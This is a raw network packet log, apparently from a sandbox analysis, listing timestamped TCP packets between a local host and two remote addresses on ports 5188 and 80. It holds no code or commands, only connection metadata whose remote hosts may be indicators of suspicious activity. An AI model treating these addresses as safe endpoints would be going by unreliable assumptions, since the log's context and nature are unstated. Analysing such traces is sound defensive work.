                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.669174910 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.669966936 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.670099974 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.670160055 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.671092987 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.671572924 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.671756029 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.672313929 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.672535896 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.672605038 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.673458099 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.673970938 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.674144983 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.674464941 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.674748898 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.674786091 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.675698996 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.676069975 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.676219940 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.676767111 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.676903009 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.676964998 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.677995920 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.686055899 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.686075926 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.704261065 CET8049800185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.728358984 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.728415012 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.728499889 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.728548050 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.728864908 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.728910923 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.728957891 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.729126930 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.730027914 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.730081081 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.730271101 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.730315924 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.731209993 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.731264114 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.731275082 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.731369972 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.732343912 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.732393980 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.732424021 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.732465029 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.733521938 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.733561039 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.733978033 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.734096050 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.734658957 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.734699965 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.734707117 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.734743118 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.735790014 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.735909939 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.735915899 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.735997915 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.736974955 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.737027884 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.737518072 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.737557888 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.738120079 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.738171101 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.738296986 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.738341093 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.739275932 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.739366055 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.739372015 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.739413977 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.740425110 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.740556955 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.740576982 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.740598917 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.741626024 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.741681099 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.742074013 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.742120028 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.742827892 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.742913008 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.743000031 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.743072987 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.743922949 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.743974924 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.744044065 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.744083881 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.745047092 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.745098114 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.745171070 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.745213032 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.746243954 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.746289015 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.746465921 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.746505976 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.747343063 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.747445107 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.747489929 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.747525930 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.748518944 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.748565912 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.748621941 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.748698950 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.749680042 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.749735117 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.749838114 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.749881983 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.750888109 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.750937939 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.751180887 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.751230955 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.752916098 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.753096104 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.753128052 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.753144979 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.753987074 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.754038095 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.754108906 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.754151106 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.755105972 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.755148888 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.755342007 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.755383015 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.756042004 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.756093979 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.756103992 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.756145954 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.757004023 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.757045984 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.757277012 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.757329941 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.758019924 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.758080006 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.758270979 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.758315086 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.759783983 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.759830952 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.759993076 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.760044098 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.760910988 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.760965109 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.761095047 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.761217117 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.762412071 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.762478113 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.762643099 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.762701988 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.763324976 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.763370991 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.763407946 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.763587952 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.764169931 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.764214039 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.764278889 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.764386892 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.764950991 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.764997959 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.765027046 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.765069008 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.766086102 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.766134977 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.766164064 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.766208887 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.766982079 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.767038107 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.767071009 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.767167091 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.768199921 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.768246889 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.768261909 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.768297911 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.769330978 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.769396067 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.769442081 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.770508051 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.770528078 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.770550013 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.770564079 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.771622896 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.771764994 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.771768093 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.771797895 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.772751093 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.772818089 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.772859097 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.773960114 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.774106026 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.774156094 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.775065899 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.775113106 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.775204897 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.775242090 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.776223898 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.776276112 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.776458025 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.776591063 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.777328014 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.777369976 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.777596951 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.777709961 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.778557062 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.778600931 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.778647900 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.778809071 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.779673100 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.779732943 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.779891968 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.779942036 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.780853033 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.780899048 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.780925989 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.780950069 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.781991005 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.782044888 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.782222986 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.782265902 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.783149004 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.783196926 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.783205032 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.783236980 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.784308910 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.784363985 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.784501076 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.784545898 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.785494089 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.785545111 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.785970926 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.786015034 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.786607981 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.786657095 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.786680937 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.786725998 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.787756920 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.787806988 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.787887096 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.787933111 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.788865089 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.788911104 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.810678005 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.810787916 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.810861111 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.811197042 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.811422110 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.811475039 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.812320948 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.812591076 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.812690973 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.813466072 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.813797951 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.813868046 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.814577103 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.815074921 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.815114975 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.815752983 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.815907001 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.816026926 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.816879034 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.816922903 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.817142963 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.818007946 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.818264008 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.818377018 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.819135904 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.819583893 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.819657087 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.820444107 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.821167946 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:14.821214914 CET497925188192.168.2.1192.255.85.66
